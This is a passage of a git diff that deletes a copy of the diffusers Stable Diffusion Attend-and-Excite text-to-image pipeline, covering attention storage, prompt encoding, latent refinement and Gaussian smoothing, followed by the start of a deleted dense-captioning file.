self.step_store = self.get_empty_store() - self.attention_store = {} - self.curr_step_index = 0 - self.attn_res = attn_res - - -class AttendExciteAttnProcessor: - def __init__(self, attnstore, place_in_unet): - super().__init__() - self.attnstore = attnstore - self.place_in_unet = place_in_unet - - def 
__call__(self, attn: Attention, hidden_states, encoder_hidden_states=None, attention_mask=None): - batch_size, sequence_length, _ = hidden_states.shape - attention_mask = attn.prepare_attention_mask(attention_mask, sequence_length, batch_size) - - query = attn.to_q(hidden_states) - - is_cross = encoder_hidden_states is not None - encoder_hidden_states = encoder_hidden_states if encoder_hidden_states is not None else hidden_states - key = attn.to_k(encoder_hidden_states) - value = attn.to_v(encoder_hidden_states) - - query = attn.head_to_batch_dim(query) - key = attn.head_to_batch_dim(key) - value = attn.head_to_batch_dim(value) - - attention_probs = attn.get_attention_scores(query, key, attention_mask) - - # only need to store attention maps during the Attend and Excite process - if attention_probs.requires_grad: - self.attnstore(attention_probs, is_cross, self.place_in_unet) - - hidden_states = torch.bmm(attention_probs, value) - hidden_states = attn.batch_to_head_dim(hidden_states) - - # linear proj - hidden_states = attn.to_out[0](hidden_states) - # dropout - hidden_states = attn.to_out[1](hidden_states) - - return hidden_states - - -class StableDiffusionAttendAndExcitePipeline(DiffusionPipeline, TextualInversionLoaderMixin): - r""" - Pipeline for text-to-image generation using Stable Diffusion and Attend-and-Excite. - - This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods - implemented for all pipelines (downloading, saving, running on a particular device, etc.). - - Args: - vae ([`AutoencoderKL`]): - Variational Auto-Encoder (VAE) model to encode and decode images to and from latent representations. - text_encoder ([`~transformers.CLIPTextModel`]): - Frozen text-encoder ([clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14)). - tokenizer ([`~transformers.CLIPTokenizer`]): - A `CLIPTokenizer` to tokenize text. - unet ([`UNet2DConditionModel`]): - A `UNet2DConditionModel` to denoise the encoded image latents. - scheduler ([`SchedulerMixin`]): - A scheduler to be used in combination with `unet` to denoise the encoded image latents. Can be one of - [`DDIMScheduler`], [`LMSDiscreteScheduler`], or [`PNDMScheduler`]. - safety_checker ([`StableDiffusionSafetyChecker`]): - Classification module that estimates whether generated images could be considered offensive or harmful. - Please refer to the [model card](https://huggingface.co/runwayml/stable-diffusion-v1-5) for more details - about a model's potential harms. - feature_extractor ([`~transformers.CLIPImageProcessor`]): - A `CLIPImageProcessor` to extract features from generated images; used as inputs to the `safety_checker`. - """ - _optional_components = ["safety_checker", "feature_extractor"] - - def __init__( - self, - vae: AutoencoderKL, - text_encoder: CLIPTextModel, - tokenizer: CLIPTokenizer, - unet: UNet2DConditionModel, - scheduler: KarrasDiffusionSchedulers, - safety_checker: StableDiffusionSafetyChecker, - feature_extractor: CLIPImageProcessor, - requires_safety_checker: bool = True, - ): - super().__init__() - - if safety_checker is None and requires_safety_checker: - logger.warning( - f"You have disabled the safety checker for {self.__class__} by passing `safety_checker=None`. Ensure" - " that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered" - " results in services or applications open to the public. 
Both the diffusers team and Hugging Face" - " strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling" - " it only for use-cases that involve analyzing network behavior or auditing its results. For more" - " information, please have a look at https://github.com/huggingface/diffusers/pull/254 ." - ) - - if safety_checker is not None and feature_extractor is None: - raise ValueError( - "Make sure to define a feature extractor when loading {self.__class__} if you want to use the safety" - " checker. If you do not want to use the safety checker, you can pass `'safety_checker=None'` instead." - ) - - self.register_modules( - vae=vae, - text_encoder=text_encoder, - tokenizer=tokenizer, - unet=unet, - scheduler=scheduler, - safety_checker=safety_checker, - feature_extractor=feature_extractor, - ) - self.vae_scale_factor = 2 ** (len(self.vae.config.block_out_channels) - 1) - self.image_processor = VaeImageProcessor(vae_scale_factor=self.vae_scale_factor) - self.register_to_config(requires_safety_checker=requires_safety_checker) - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.enable_vae_slicing - def enable_vae_slicing(self): - r""" - Enable sliced VAE decoding. When this option is enabled, the VAE will split the input tensor in slices to - compute decoding in several steps. This is useful to save some memory and allow larger batch sizes. - """ - self.vae.enable_slicing() - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.disable_vae_slicing - def disable_vae_slicing(self): - r""" - Disable sliced VAE decoding. If `enable_vae_slicing` was previously enabled, this method will go back to - computing decoding in one step. - """ - self.vae.disable_slicing() - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline._encode_prompt - def _encode_prompt( - self, - prompt, - device, - num_images_per_prompt, - do_classifier_free_guidance, - negative_prompt=None, - prompt_embeds: Optional[torch.FloatTensor] = None, - negative_prompt_embeds: Optional[torch.FloatTensor] = None, - lora_scale: Optional[float] = None, - ): - r""" - Encodes the prompt into text encoder hidden states. - - Args: - prompt (`str` or `List[str]`, *optional*): - prompt to be encoded - device: (`torch.device`): - torch device - num_images_per_prompt (`int`): - number of images that should be generated per prompt - do_classifier_free_guidance (`bool`): - whether to use classifier free guidance or not - negative_prompt (`str` or `List[str]`, *optional*): - The prompt or prompts not to guide the image generation. If not defined, one has to pass - `negative_prompt_embeds` instead. Ignored when not using guidance (i.e., ignored if `guidance_scale` is - less than `1`). - prompt_embeds (`torch.FloatTensor`, *optional*): - Pre-generated text embeddings. Can be used to easily tweak text inputs, *e.g.* prompt weighting. If not - provided, text embeddings will be generated from `prompt` input argument. - negative_prompt_embeds (`torch.FloatTensor`, *optional*): - Pre-generated negative text embeddings. Can be used to easily tweak text inputs, *e.g.* prompt - weighting. If not provided, negative_prompt_embeds will be generated from `negative_prompt` input - argument. - lora_scale (`float`, *optional*): - A lora scale that will be applied to all LoRA layers of the text encoder if LoRA layers are loaded. 
- """ - # set lora scale so that monkey patched LoRA - # function of text encoder can correctly access it - if lora_scale is not None and isinstance(self, LoraLoaderMixin): - self._lora_scale = lora_scale - - if prompt is not None and isinstance(prompt, str): - batch_size = 1 - elif prompt is not None and isinstance(prompt, list): - batch_size = len(prompt) - else: - batch_size = prompt_embeds.shape[0] - - if prompt_embeds is None: - # textual inversion: procecss multi-vector tokens if necessary - if isinstance(self, TextualInversionLoaderMixin): - prompt = self.maybe_convert_prompt(prompt, self.tokenizer) - - text_inputs = self.tokenizer( - prompt, - padding="max_length", - max_length=self.tokenizer.model_max_length, - truncation=True, - return_tensors="pt", - ) - text_input_ids = text_inputs.input_ids - untruncated_ids = self.tokenizer(prompt, padding="longest", return_tensors="pt").input_ids - - if untruncated_ids.shape[-1] >= text_input_ids.shape[-1] and not torch.equal( - text_input_ids, untruncated_ids - ): - removed_text = self.tokenizer.batch_decode( - untruncated_ids[:, self.tokenizer.model_max_length - 1 : -1] - ) - logger.warning( - "The following part of your input was truncated because CLIP can only handle sequences up to" - f" {self.tokenizer.model_max_length} tokens: {removed_text}" - ) - - if hasattr(self.text_encoder.config, "use_attention_mask") and self.text_encoder.config.use_attention_mask: - attention_mask = text_inputs.attention_mask.to(device) - else: - attention_mask = None - - prompt_embeds = self.text_encoder( - text_input_ids.to(device), - attention_mask=attention_mask, - ) - prompt_embeds = prompt_embeds[0] - - prompt_embeds = prompt_embeds.to(dtype=self.text_encoder.dtype, device=device) - - bs_embed, seq_len, _ = prompt_embeds.shape - # duplicate text embeddings for each generation per prompt, using mps friendly method - prompt_embeds = prompt_embeds.repeat(1, num_images_per_prompt, 1) - prompt_embeds = prompt_embeds.view(bs_embed * num_images_per_prompt, seq_len, -1) - - # get unconditional embeddings for classifier free guidance - if do_classifier_free_guidance and negative_prompt_embeds is None: - uncond_tokens: List[str] - if negative_prompt is None: - uncond_tokens = [""] * batch_size - elif prompt is not None and type(prompt) is not type(negative_prompt): - raise TypeError( - f"`negative_prompt` should be the same type to `prompt`, but got {type(negative_prompt)} !=" - f" {type(prompt)}." - ) - elif isinstance(negative_prompt, str): - uncond_tokens = [negative_prompt] - elif batch_size != len(negative_prompt): - raise ValueError( - f"`negative_prompt`: {negative_prompt} has batch size {len(negative_prompt)}, but `prompt`:" - f" {prompt} has batch size {batch_size}. Please make sure that passed `negative_prompt` matches" - " the batch size of `prompt`." 
- ) - else: - uncond_tokens = negative_prompt - - # textual inversion: procecss multi-vector tokens if necessary - if isinstance(self, TextualInversionLoaderMixin): - uncond_tokens = self.maybe_convert_prompt(uncond_tokens, self.tokenizer) - - max_length = prompt_embeds.shape[1] - uncond_input = self.tokenizer( - uncond_tokens, - padding="max_length", - max_length=max_length, - truncation=True, - return_tensors="pt", - ) - - if hasattr(self.text_encoder.config, "use_attention_mask") and self.text_encoder.config.use_attention_mask: - attention_mask = uncond_input.attention_mask.to(device) - else: - attention_mask = None - - negative_prompt_embeds = self.text_encoder( - uncond_input.input_ids.to(device), - attention_mask=attention_mask, - ) - negative_prompt_embeds = negative_prompt_embeds[0] - - if do_classifier_free_guidance: - # duplicate unconditional embeddings for each generation per prompt, using mps friendly method - seq_len = negative_prompt_embeds.shape[1] - - negative_prompt_embeds = negative_prompt_embeds.to(dtype=self.text_encoder.dtype, device=device) - - negative_prompt_embeds = negative_prompt_embeds.repeat(1, num_images_per_prompt, 1) - negative_prompt_embeds = negative_prompt_embeds.view(batch_size * num_images_per_prompt, seq_len, -1) - - # For classifier free guidance, we need to do two forward passes. - # Here we concatenate the unconditional and text embeddings into a single batch - # to avoid doing two forward passes - prompt_embeds = torch.cat([negative_prompt_embeds, prompt_embeds]) - - return prompt_embeds - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.run_safety_checker - def run_safety_checker(self, image, device, dtype): - if self.safety_checker is None: - has_nsfw_concept = None - else: - if torch.is_tensor(image): - feature_extractor_input = self.image_processor.postprocess(image, output_type="pil") - else: - feature_extractor_input = self.image_processor.numpy_to_pil(image) - safety_checker_input = self.feature_extractor(feature_extractor_input, return_tensors="pt").to(device) - image, has_nsfw_concept = self.safety_checker( - images=image, clip_input=safety_checker_input.pixel_values.to(dtype) - ) - return image, has_nsfw_concept - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.decode_latents - def decode_latents(self, latents): - warnings.warn( - "The decode_latents method is deprecated and will be removed in a future version. Please" - " use VaeImageProcessor instead", - FutureWarning, - ) - latents = 1 / self.vae.config.scaling_factor * latents - image = self.vae.decode(latents, return_dict=False)[0] - image = (image / 2 + 0.5).clamp(0, 1) - # we always cast to float32 as this does not cause significant overhead and is compatible with bfloat16 - image = image.cpu().permute(0, 2, 3, 1).float().numpy() - return image - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.prepare_extra_step_kwargs - def prepare_extra_step_kwargs(self, generator, eta): - # prepare extra kwargs for the scheduler step, since not all schedulers have the same signature - # eta (η) is only used with the DDIMScheduler, it will be ignored for other schedulers. 
- # eta corresponds to η in DDIM paper: https://arxiv.org/abs/2010.02502 - # and should be between [0, 1] - - accepts_eta = "eta" in set(inspect.signature(self.scheduler.step).parameters.keys()) - extra_step_kwargs = {} - if accepts_eta: - extra_step_kwargs["eta"] = eta - - # check if the scheduler accepts generator - accepts_generator = "generator" in set(inspect.signature(self.scheduler.step).parameters.keys()) - if accepts_generator: - extra_step_kwargs["generator"] = generator - return extra_step_kwargs - - def check_inputs( - self, - prompt, - indices, - height, - width, - callback_steps, - negative_prompt=None, - prompt_embeds=None, - negative_prompt_embeds=None, - ): - if height % 8 != 0 or width % 8 != 0: - raise ValueError(f"`height` and `width` have to be divisible by 8 but are {height} and {width}.") - - if (callback_steps is None) or ( - callback_steps is not None and (not isinstance(callback_steps, int) or callback_steps <= 0) - ): - raise ValueError( - f"`callback_steps` has to be a positive integer but is {callback_steps} of type" - f" {type(callback_steps)}." - ) - - if prompt is not None and prompt_embeds is not None: - raise ValueError( - f"Cannot forward both `prompt`: {prompt} and `prompt_embeds`: {prompt_embeds}. Please make sure to" - " only forward one of the two." - ) - elif prompt is None and prompt_embeds is None: - raise ValueError( - "Provide either `prompt` or `prompt_embeds`. Cannot leave both `prompt` and `prompt_embeds` undefined." - ) - elif prompt is not None and (not isinstance(prompt, str) and not isinstance(prompt, list)): - raise ValueError(f"`prompt` has to be of type `str` or `list` but is {type(prompt)}") - - if negative_prompt is not None and negative_prompt_embeds is not None: - raise ValueError( - f"Cannot forward both `negative_prompt`: {negative_prompt} and `negative_prompt_embeds`:" - f" {negative_prompt_embeds}. Please make sure to only forward one of the two." - ) - - if prompt_embeds is not None and negative_prompt_embeds is not None: - if prompt_embeds.shape != negative_prompt_embeds.shape: - raise ValueError( - "`prompt_embeds` and `negative_prompt_embeds` must have the same shape when passed directly, but" - f" got: `prompt_embeds` {prompt_embeds.shape} != `negative_prompt_embeds`" - f" {negative_prompt_embeds.shape}." - ) - - indices_is_list_ints = isinstance(indices, list) and isinstance(indices[0], int) - indices_is_list_list_ints = ( - isinstance(indices, list) and isinstance(indices[0], list) and isinstance(indices[0][0], int) - ) - - if not indices_is_list_ints and not indices_is_list_list_ints: - raise TypeError("`indices` must be a list of ints or a list of a list of ints") - - if indices_is_list_ints: - indices_batch_size = 1 - elif indices_is_list_list_ints: - indices_batch_size = len(indices) - - if prompt is not None and isinstance(prompt, str): - prompt_batch_size = 1 - elif prompt is not None and isinstance(prompt, list): - prompt_batch_size = len(prompt) - elif prompt_embeds is not None: - prompt_batch_size = prompt_embeds.shape[0] - - if indices_batch_size != prompt_batch_size: - raise ValueError( - f"indices batch size must be same as prompt batch size. 
indices batch size: {indices_batch_size}, prompt batch size: {prompt_batch_size}" - ) - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.prepare_latents - def prepare_latents(self, batch_size, num_channels_latents, height, width, dtype, device, generator, latents=None): - shape = (batch_size, num_channels_latents, height // self.vae_scale_factor, width // self.vae_scale_factor) - if isinstance(generator, list) and len(generator) != batch_size: - raise ValueError( - f"You have passed a list of generators of length {len(generator)}, but requested an effective batch" - f" size of {batch_size}. Make sure the batch size matches the length of the generators." - ) - - if latents is None: - latents = randn_tensor(shape, generator=generator, device=device, dtype=dtype) - else: - latents = latents.to(device) - - # scale the initial noise by the standard deviation required by the scheduler - latents = latents * self.scheduler.init_noise_sigma - return latents - - @staticmethod - def _compute_max_attention_per_index( - attention_maps: torch.Tensor, - indices: List[int], - ) -> List[torch.Tensor]: - """Computes the maximum attention value for each of the tokens we wish to alter.""" - attention_for_text = attention_maps[:, :, 1:-1] - attention_for_text *= 100 - attention_for_text = torch.nn.functional.softmax(attention_for_text, dim=-1) - - # Shift indices since we removed the first token - indices = [index - 1 for index in indices] - - # Extract the maximum values - max_indices_list = [] - for i in indices: - image = attention_for_text[:, :, i] - smoothing = GaussianSmoothing().to(attention_maps.device) - input = F.pad(image.unsqueeze(0).unsqueeze(0), (1, 1, 1, 1), mode="reflect") - image = smoothing(input).squeeze(0).squeeze(0) - max_indices_list.append(image.max()) - return max_indices_list - - def _aggregate_and_get_max_attention_per_token( - self, - indices: List[int], - ): - """Aggregates the attention for each token and computes the max activation value for each token to alter.""" - attention_maps = self.attention_store.aggregate_attention( - from_where=("up", "down", "mid"), - ) - max_attention_per_index = self._compute_max_attention_per_index( - attention_maps=attention_maps, - indices=indices, - ) - return max_attention_per_index - - @staticmethod - def _compute_loss(max_attention_per_index: List[torch.Tensor]) -> torch.Tensor: - """Computes the attend-and-excite loss using the maximum attention value for each token.""" - losses = [max(0, 1.0 - curr_max) for curr_max in max_attention_per_index] - loss = max(losses) - return loss - - @staticmethod - def _update_latent(latents: torch.Tensor, loss: torch.Tensor, step_size: float) -> torch.Tensor: - """Update the latent according to the computed loss.""" - grad_cond = torch.autograd.grad(loss.requires_grad_(True), [latents], retain_graph=True)[0] - latents = latents - step_size * grad_cond - return latents - - def _perform_iterative_refinement_step( - self, - latents: torch.Tensor, - indices: List[int], - loss: torch.Tensor, - threshold: float, - text_embeddings: torch.Tensor, - step_size: float, - t: int, - max_refinement_steps: int = 20, - ): - """ - Performs the iterative latent refinement introduced in the paper. Here, we continuously update the latent code - according to our loss objective until the given threshold is reached for all tokens. 
- """ - iteration = 0 - target_loss = max(0, 1.0 - threshold) - while loss > target_loss: - iteration += 1 - - latents = latents.clone().detach().requires_grad_(True) - self.unet(latents, t, encoder_hidden_states=text_embeddings).sample - self.unet.zero_grad() - - # Get max activation value for each subject token - max_attention_per_index = self._aggregate_and_get_max_attention_per_token( - indices=indices, - ) - - loss = self._compute_loss(max_attention_per_index) - - if loss != 0: - latents = self._update_latent(latents, loss, step_size) - - logger.info(f"\t Try {iteration}. loss: {loss}") - - if iteration >= max_refinement_steps: - logger.info(f"\t Exceeded max number of iterations ({max_refinement_steps})! ") - break - - # Run one more time but don't compute gradients and update the latents. - # We just need to compute the new loss - the grad update will occur below - latents = latents.clone().detach().requires_grad_(True) - _ = self.unet(latents, t, encoder_hidden_states=text_embeddings).sample - self.unet.zero_grad() - - # Get max activation value for each subject token - max_attention_per_index = self._aggregate_and_get_max_attention_per_token( - indices=indices, - ) - loss = self._compute_loss(max_attention_per_index) - logger.info(f"\t Finished with loss of: {loss}") - return loss, latents, max_attention_per_index - - def register_attention_control(self): - attn_procs = {} - cross_att_count = 0 - for name in self.unet.attn_processors.keys(): - if name.startswith("mid_block"): - place_in_unet = "mid" - elif name.startswith("up_blocks"): - place_in_unet = "up" - elif name.startswith("down_blocks"): - place_in_unet = "down" - else: - continue - - cross_att_count += 1 - attn_procs[name] = AttendExciteAttnProcessor(attnstore=self.attention_store, place_in_unet=place_in_unet) - - self.unet.set_attn_processor(attn_procs) - self.attention_store.num_att_layers = cross_att_count - - def get_indices(self, prompt: str) -> Dict[str, int]: - """Utility function to list the indices of the tokens you wish to alte""" - ids = self.tokenizer(prompt).input_ids - indices = {i: tok for tok, i in zip(self.tokenizer.convert_ids_to_tokens(ids), range(len(ids)))} - return indices - - @torch.no_grad() - @replace_example_docstring(EXAMPLE_DOC_STRING) - def __call__( - self, - prompt: Union[str, List[str]], - token_indices: Union[List[int], List[List[int]]], - height: Optional[int] = None, - width: Optional[int] = None, - num_inference_steps: int = 50, - guidance_scale: float = 7.5, - negative_prompt: Optional[Union[str, List[str]]] = None, - num_images_per_prompt: int = 1, - eta: float = 0.0, - generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None, - latents: Optional[torch.FloatTensor] = None, - prompt_embeds: Optional[torch.FloatTensor] = None, - negative_prompt_embeds: Optional[torch.FloatTensor] = None, - output_type: Optional[str] = "pil", - return_dict: bool = True, - callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None, - callback_steps: int = 1, - cross_attention_kwargs: Optional[Dict[str, Any]] = None, - max_iter_to_alter: int = 25, - thresholds: dict = {0: 0.05, 10: 0.5, 20: 0.8}, - scale_factor: int = 20, - attn_res: Optional[Tuple[int]] = (16, 16), - ): - r""" - The call function to the pipeline for generation. - - Args: - prompt (`str` or `List[str]`, *optional*): - The prompt or prompts to guide image generation. If not defined, you need to pass `prompt_embeds`. - token_indices (`List[int]`): - The token indices to alter with attend-and-excite. 
- height (`int`, *optional*, defaults to `self.unet.config.sample_size * self.vae_scale_factor`): - The height in pixels of the generated image. - width (`int`, *optional*, defaults to `self.unet.config.sample_size * self.vae_scale_factor`): - The width in pixels of the generated image. - num_inference_steps (`int`, *optional*, defaults to 50): - The number of denoising steps. More denoising steps usually lead to a higher quality image at the - expense of slower inference. - guidance_scale (`float`, *optional*, defaults to 7.5): - A higher guidance scale value encourages the model to generate images closely linked to the text - `prompt` at the expense of lower image quality. Guidance scale is enabled when `guidance_scale > 1`. - negative_prompt (`str` or `List[str]`, *optional*): - The prompt or prompts to guide what to not include in image generation. If not defined, you need to - pass `negative_prompt_embeds` instead. Ignored when not using guidance (`guidance_scale < 1`). - num_images_per_prompt (`int`, *optional*, defaults to 1): - The number of images to generate per prompt. - eta (`float`, *optional*, defaults to 0.0): - Corresponds to parameter eta (η) from the [DDIM](https://arxiv.org/abs/2010.02502) paper. Only applies - to the [`~schedulers.DDIMScheduler`], and is ignored in other schedulers. - generator (`torch.Generator` or `List[torch.Generator]`, *optional*): - A [`torch.Generator`](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make - generation deterministic. - latents (`torch.FloatTensor`, *optional*): - Pre-generated noisy latents sampled from a Gaussian distribution, to be used as inputs for image - generation. Can be used to tweak the same generation with different prompts. If not provided, a latents - tensor is generated by sampling using the supplied random `generator`. - prompt_embeds (`torch.FloatTensor`, *optional*): - Pre-generated text embeddings. Can be used to easily tweak text inputs (prompt weighting). If not - provided, text embeddings are generated from the `prompt` input argument. - negative_prompt_embeds (`torch.FloatTensor`, *optional*): - Pre-generated negative text embeddings. Can be used to easily tweak text inputs (prompt weighting). If - not provided, `negative_prompt_embeds` are generated from the `negative_prompt` input argument. - output_type (`str`, *optional*, defaults to `"pil"`): - The output format of the generated image. Choose between `PIL.Image` or `np.array`. - return_dict (`bool`, *optional*, defaults to `True`): - Whether or not to return a [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] instead of a - plain tuple. - callback (`Callable`, *optional*): - A function that calls every `callback_steps` steps during inference. The function is called with the - following arguments: `callback(step: int, timestep: int, latents: torch.FloatTensor)`. - callback_steps (`int`, *optional*, defaults to 1): - The frequency at which the `callback` function is called. If not specified, the callback is called at - every step. - cross_attention_kwargs (`dict`, *optional*): - A kwargs dictionary that if specified is passed along to the [`AttentionProcessor`] as defined in - [`self.processor`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/models/cross_attention.py). - max_iter_to_alter (`int`, *optional*, defaults to `25`): - Number of denoising steps to apply attend-and-excite. The `max_iter_to_alter` denoising steps are when - attend-and-excite is applied. 
For example, if `max_iter_to_alter` is `25` and there are a total of `30` - denoising steps, the first `25` denoising steps applies attend-and-excite and the last `5` will not. - thresholds (`dict`, *optional*, defaults to `{0: 0.05, 10: 0.5, 20: 0.8}`): - Dictionary defining the iterations and desired thresholds to apply iterative latent refinement in. - scale_factor (`int`, *optional*, default to 20): - Scale factor to control the step size of each attend-and-excite update. - attn_res (`tuple`, *optional*, default computed from width and height): - The 2D resolution of the semantic attention map. - - Examples: - - Returns: - [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] or `tuple`: - If `return_dict` is `True`, [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] is returned, - otherwise a `tuple` is returned where the first element is a list with the generated images and the - second element is a list of `bool`s indicating whether the corresponding generated image contains - "not-safe-for-work" (nsfw) content. - """ - - # 0. Default height and width to unet - height = height or self.unet.config.sample_size * self.vae_scale_factor - width = width or self.unet.config.sample_size * self.vae_scale_factor - - # 1. Check inputs. Raise error if not correct - self.check_inputs( - prompt, - token_indices, - height, - width, - callback_steps, - negative_prompt, - prompt_embeds, - negative_prompt_embeds, - ) - - # 2. Define call parameters - if prompt is not None and isinstance(prompt, str): - batch_size = 1 - elif prompt is not None and isinstance(prompt, list): - batch_size = len(prompt) - else: - batch_size = prompt_embeds.shape[0] - - device = self._execution_device - # here `guidance_scale` is defined analog to the guidance weight `w` of equation (2) - # of the Imagen paper: https://arxiv.org/pdf/2205.11487.pdf . `guidance_scale = 1` - # corresponds to doing no classifier free guidance. - do_classifier_free_guidance = guidance_scale > 1.0 - - # 3. Encode input prompt - prompt_embeds = self._encode_prompt( - prompt, - device, - num_images_per_prompt, - do_classifier_free_guidance, - negative_prompt, - prompt_embeds=prompt_embeds, - negative_prompt_embeds=negative_prompt_embeds, - ) - - # 4. Prepare timesteps - self.scheduler.set_timesteps(num_inference_steps, device=device) - timesteps = self.scheduler.timesteps - - # 5. Prepare latent variables - num_channels_latents = self.unet.config.in_channels - latents = self.prepare_latents( - batch_size * num_images_per_prompt, - num_channels_latents, - height, - width, - prompt_embeds.dtype, - device, - generator, - latents, - ) - - # 6. Prepare extra step kwargs. TODO: Logic should ideally just be moved out of the pipeline - extra_step_kwargs = self.prepare_extra_step_kwargs(generator, eta) - - if attn_res is None: - attn_res = int(np.ceil(width / 32)), int(np.ceil(height / 32)) - self.attention_store = AttentionStore(attn_res) - self.register_attention_control() - - # default config for step size from original repo - scale_range = np.linspace(1.0, 0.5, len(self.scheduler.timesteps)) - step_size = scale_factor * np.sqrt(scale_range) - - text_embeddings = ( - prompt_embeds[batch_size * num_images_per_prompt :] if do_classifier_free_guidance else prompt_embeds - ) - - if isinstance(token_indices[0], int): - token_indices = [token_indices] - - indices = [] - - for ind in token_indices: - indices = indices + [ind] * num_images_per_prompt - - # 7. 
Denoising loop - num_warmup_steps = len(timesteps) - num_inference_steps * self.scheduler.order - with self.progress_bar(total=num_inference_steps) as progress_bar: - for i, t in enumerate(timesteps): - # Attend and excite process - with torch.enable_grad(): - latents = latents.clone().detach().requires_grad_(True) - updated_latents = [] - for latent, index, text_embedding in zip(latents, indices, text_embeddings): - # Forward pass of denoising with text conditioning - latent = latent.unsqueeze(0) - text_embedding = text_embedding.unsqueeze(0) - - self.unet( - latent, - t, - encoder_hidden_states=text_embedding, - cross_attention_kwargs=cross_attention_kwargs, - ).sample - self.unet.zero_grad() - - # Get max activation value for each subject token - max_attention_per_index = self._aggregate_and_get_max_attention_per_token( - indices=index, - ) - - loss = self._compute_loss(max_attention_per_index=max_attention_per_index) - - # If this is an iterative refinement step, verify we have reached the desired threshold for all - if i in thresholds.keys() and loss > 1.0 - thresholds[i]: - loss, latent, max_attention_per_index = self._perform_iterative_refinement_step( - latents=latent, - indices=index, - loss=loss, - threshold=thresholds[i], - text_embeddings=text_embedding, - step_size=step_size[i], - t=t, - ) - - # Perform gradient update - if i < max_iter_to_alter: - if loss != 0: - latent = self._update_latent( - latents=latent, - loss=loss, - step_size=step_size[i], - ) - logger.info(f"Iteration {i} | Loss: {loss:0.4f}") - - updated_latents.append(latent) - - latents = torch.cat(updated_latents, dim=0) - - # expand the latents if we are doing classifier free guidance - latent_model_input = torch.cat([latents] * 2) if do_classifier_free_guidance else latents - latent_model_input = self.scheduler.scale_model_input(latent_model_input, t) - - # predict the noise residual - noise_pred = self.unet( - latent_model_input, - t, - encoder_hidden_states=prompt_embeds, - cross_attention_kwargs=cross_attention_kwargs, - ).sample - - # perform guidance - if do_classifier_free_guidance: - noise_pred_uncond, noise_pred_text = noise_pred.chunk(2) - noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond) - - # compute the previous noisy sample x_t -> x_t-1 - latents = self.scheduler.step(noise_pred, t, latents, **extra_step_kwargs).prev_sample - - # call the callback, if provided - if i == len(timesteps) - 1 or ((i + 1) > num_warmup_steps and (i + 1) % self.scheduler.order == 0): - progress_bar.update() - if callback is not None and i % callback_steps == 0: - callback(i, t, latents) - - # 8. Post-processing - if not output_type == "latent": - image = self.vae.decode(latents / self.vae.config.scaling_factor, return_dict=False)[0] - image, has_nsfw_concept = self.run_safety_checker(image, device, prompt_embeds.dtype) - else: - image = latents - has_nsfw_concept = None - - if has_nsfw_concept is None: - do_denormalize = [True] * image.shape[0] - else: - do_denormalize = [not has_nsfw for has_nsfw in has_nsfw_concept] - - image = self.image_processor.postprocess(image, output_type=output_type, do_denormalize=do_denormalize) - - if not return_dict: - return (image, has_nsfw_concept) - - return StableDiffusionPipelineOutput(images=image, nsfw_content_detected=has_nsfw_concept) - - -class GaussianSmoothing(torch.nn.Module): - """ - Arguments: - Apply gaussian smoothing on a 1d, 2d or 3d tensor. 
Filtering is performed seperately for each channel in the input - using a depthwise convolution. - channels (int, sequence): Number of channels of the input tensors. Output will - have this number of channels as well. - kernel_size (int, sequence): Size of the gaussian kernel. sigma (float, sequence): Standard deviation of the - gaussian kernel. dim (int, optional): The number of dimensions of the data. - Default value is 2 (spatial). - """ - - # channels=1, kernel_size=kernel_size, sigma=sigma, dim=2 - def __init__( - self, - channels: int = 1, - kernel_size: int = 3, - sigma: float = 0.5, - dim: int = 2, - ): - super().__init__() - - if isinstance(kernel_size, int): - kernel_size = [kernel_size] * dim - if isinstance(sigma, float): - sigma = [sigma] * dim - - # The gaussian kernel is the product of the - # gaussian function of each dimension. - kernel = 1 - meshgrids = torch.meshgrid([torch.arange(size, dtype=torch.float32) for size in kernel_size]) - for size, std, mgrid in zip(kernel_size, sigma, meshgrids): - mean = (size - 1) / 2 - kernel *= 1 / (std * math.sqrt(2 * math.pi)) * torch.exp(-(((mgrid - mean) / (2 * std)) ** 2)) - - # Make sure sum of values in gaussian kernel equals 1. - kernel = kernel / torch.sum(kernel) - - # Reshape to depthwise convolutional weight - kernel = kernel.view(1, 1, *kernel.size()) - kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1)) - - self.register_buffer("weight", kernel) - self.groups = channels - - if dim == 1: - self.conv = F.conv1d - elif dim == 2: - self.conv = F.conv2d - elif dim == 3: - self.conv = F.conv3d - else: - raise RuntimeError("Only 1, 2 and 3 dimensions are supported. Received {}.".format(dim)) - - def forward(self, input): - """ - Arguments: - Apply gaussian filter to input. - input (torch.Tensor): Input to apply gaussian filter on. - Returns: - filtered (torch.Tensor): Filtered output. - """ - return self.conv(input, weight=self.weight.to(input.dtype), groups=self.groups) diff --git a/spaces/Awiny/Image2Paragraph/models/grit_model.py b/spaces/Awiny/Image2Paragraph/models/grit_model.py deleted file mode 100644 index a0a55a56277c0ad8c4829bb5e522871f4c211e9b..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_model.py +++ /dev/null @@ -1,27 +0,0 @@ -import os -from models.grit_src.image_dense_captions import image_caption_api - -class DenseCaptioning(): - def __init__(self, device): - self.device = device - - - def initialize_model(self): - pass - - def image_dense_caption_debug(self, image_src): - dense_caption = """ - 1. the broccoli is green, [0, 0, 333, 325]; - 2. a piece of broccoli, [0, 147, 143, 